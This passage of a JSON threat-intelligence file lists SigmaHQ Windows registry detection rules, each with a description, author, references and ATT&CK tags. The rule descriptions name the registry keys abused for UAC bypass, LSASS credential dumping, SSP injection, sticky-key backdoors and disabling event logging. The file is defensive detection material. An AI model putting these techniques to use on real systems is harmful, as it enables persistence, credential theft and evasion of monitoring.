"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", "value": "Registry Persistence Mechanisms in Recycle Bin" }, { "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "registry_event_shell_open_keys_manipulation.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "attack.t1546.001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "value": "Shell Open Registry Keys Manipulation" }, { "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", "meta": { "author": "Avneet Singh @v3t0_, oscd.community", "creation_date": "2020-11-15", "falsepositive": [ "Legitimate modification of the registry key by legitimate program" ], "filename": "registry_event_runonce_persistence.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", "https://twitter.com/pabraeken/status/990717080805789697", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "value": "Run Once Task Configuration in Registry" }, { "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", "meta": { "author": "Dmitriy Lifanov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_narrator_feedback_persistance.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", "value": "Narrator's Feedback-Hub Persistence" }, { "description": "Sysmon registry detection of a local hidden user account.", "meta": { "author": "Christian Burkard 
(Nextron Systems)", "creation_date": "2021-05-03", "falsepositive": [ "Unknown" ], "filename": "registry_event_add_local_hidden_user.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1387530414185664538", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "value": "Creation of a Local Hidden User Account by Registry" }, { "description": "Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", "meta": { "author": "oscd.community, Dmitry Uchakin", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "registry_event_bypass_via_wsreset.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", "value": "UAC Bypass Via Wsreset" }, { "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows 
NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", "meta": { "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" ], "tags": [ "attack.persistence", "attack.t1546.010" ] }, "related": [ { "dest-uuid": "cc89ecbd-3d33-4a41-bcca-001e702d18fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", "value": "New DLL Added to AppInit_DLLs Registry Key" }, { "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-20", "falsepositive": [ "Unknown" ], "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", "value": "Esentutl Volume Shadow Copy Service Keys" }, { "description": "Detects the presence of a registry key created during Azorult execution", "meta": { "author": "Trent Liffick", "creation_date": "2020-05-08", "falsepositive": [ "Unknown" ], "filename": "registry_event_mal_azorult.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" ], "tags": [ "attack.execution", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "value": "Registry Entries For Azorult Malware" }, { "description": "Detects a registry 
key used by IceID in a campaign that distributes malicious OneNote files", "meta": { "author": "Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "registry_event_malware_qakbot_registry.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "value": "Potential Qakbot Registry Activity" }, { "description": "Detects the use of Windows Credential Editor (WCE)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-31", "falsepositive": [ "Unknown" ], "filename": "registry_event_hack_wce_reg.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.ampliasecurity.com/research/windows-credentials-editor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", "value": "Windows Credential Editor Registry" }, { "description": "Detects value modification of registry key containing path to binary used as screensaver.", "meta": { "author": "Bartlomiej Czyz @bczyz1, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate 
modification of screensaver" ], "filename": "registry_event_modify_screensaver_binary_path.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.002" ] }, "related": [ { "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", "value": "Path To Screensaver Binary Modified" }, { "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1182516740955226112", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"919f2ef0-be2d-4a7a-b635-eb2b41fde044", "value": "Disable Security Events Logging Adding Reg Key MiniNt" }, { "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", "meta": { "author": "omkar72", "creation_date": "2020-10-25", "falsepositive": [ "Unlikely" ], "filename": "registry_event_office_test_regadd.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" ], "tags": [ "attack.persistence", "attack.t1137.002" ] }, "related": [ { "dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "value": "Office Application Startup - Office Test" }, { "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-01", "falsepositive": [ "Software installers downloaded and used by users" ], "filename": "registry_event_susp_download_run_key.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", "value": "Suspicious Run Key from Download" }, { "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Unknown" ], "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" ], "tags": [ "attack.resource-development", "attack.t1608" ] }, "related": [ { "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "value": "HybridConnectionManager Service Installation - Registry" }, { "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.\n", "meta": { "author": "iwillkeepwatch", "creation_date": "2019-01-18", "falsepositive": [ "Unknown" ], "filename": "registry_event_ssp_added_lsa_config.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" ], "tags": [ "attack.persistence", "attack.t1547.005" ] }, "related": [ { "dest-uuid": "5095a853-299c-4876-abd7-ac0050fb5462", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "value": "Security Support Provider (SSP) Added to LSA Configuration" }, { "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-26", "falsepositive": [ "Unlikely" ], "filename": "registry_event_silentprocessexit_lsass.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", "value": "Potential Credential Dumping Via LSASS SilentProcessExit Technique" }, { "description": "Detects Processes accessing the camera and microphone from suspicious folder", "meta": { "author": "Den Iuzvyk", "creation_date": "2020-06-07", "falsepositive": [ "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "filename": "registry_event_susp_mic_cam_access.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" ], "tags": [ "attack.collection", "attack.t1125", "attack.t1123" ] }, "related": [ { "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", "value": "Suspicious Camera and Microphone Access" }, { "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-08-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_disable_wdigest_credential_guard.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ 
"https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "value": "Wdigest CredGuard Registry Modification" }, { "description": "Detects actions caused by the RedMimicry Winnti playbook", "meta": { "author": "Alexander Rausch", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "registry_event_redmimicry_winnti_reg.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://redmimicry.com", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", "value": "RedMimicry Winnti Playbook Registry Manipulation" }, { "description": "Detects Pandemic Windows Implant", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-06-01", "falsepositive": [ "Unknown" ], "filename": "registry_event_apt_pandemic.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/MalwareJake/status/870349480356454401", "https://wikileaks.org/vault7/#Pandemic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": 
"e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "value": "Pandemic Registry Key" }, { "description": "Detects enabling of the \"AllowAnonymousCallback\" registry value, which allows a remote connection between computers that do not have a trust relationship.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-03", "falsepositive": [ "Administrative activity" ], "filename": "registry_set_enable_anonymous_connection.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d431012-2ab5-4db7-a84e-b29809da2172", "value": "Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback" }, { "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "meta": { "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "creation_date": "2018-03-15", "falsepositive": [ "Unlikely" ], "filename": "registry_event_stickykey_like_backdoor.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", 
"https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.008", "car.2014-11-003", "car.2014-11-008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", "value": "Sticky Key Like Backdoor Usage - Registry" }, { "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-16", "falsepositive": [ "Unknown" ], "filename": "registry_event_susp_lsass_dll_load.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1183745981189427200", "https://blog.xpnsec.com/exploring-mimikatz-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1547.008" ] }, "related": [ { "dest-uuid": "f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", "value": "DLL Load via LSASS" }, { "description": "Detects NetNTLM downgrade attack", "meta": { "author": "Florian Roth (Nextron Systems), wagga", "creation_date": "2018-03-20", "falsepositive": [ "Unknown" ], "filename": "registry_event_net_ntlm_downgrade.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ 
"https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "value": "NetNTLM Downgrade Attack - Registry" }, { "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", "meta": { "author": "omkar72", "creation_date": "2020-10-30", "falsepositive": [ "Unknown" ], "filename": "registry_event_runkey_winekey.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", "value": "WINEKEY Registry Modification" }, { "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { "author": "Nik Seetharaman", "creation_date": "2018-07-16", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "registry_event_cmstp_execution_by_registry.yml", "level": "high", 
"logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.003", "attack.g0069", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", "value": "CMSTP Execution Registry Event" }, { "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Legitimate use of SysInternals tools. 
Filter the legitimate paths used in your environment" ], "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/1008587936735035392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "value": "PUA - Sysinternals Tools Execution - Registry" }, { "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unlikely" ], "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml", "level": "high", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", "value": "Suspicious Execution Of Renamed Sysinternals Tools - Registry" }, { "description": "Detects registry keys related to NetWire RAT", "meta": { "author": "Christopher Peacock", "creation_date": "2021-10-07", "falsepositive": [ "Unknown" ], "filename": 
"registry_add_malware_netwire.yml", "level": "high", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_netwire.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", "value": "Potential NetWire RAT Activity - Registry" }, { "description": "Detects COM object hijacking via TreatAs subkey", "meta": { "author": "Kutepov Anton, oscd.community", "creation_date": "2019-10-23", "falsepositive": [ "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], "filename": "registry_add_persistence_com_key_linking.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { 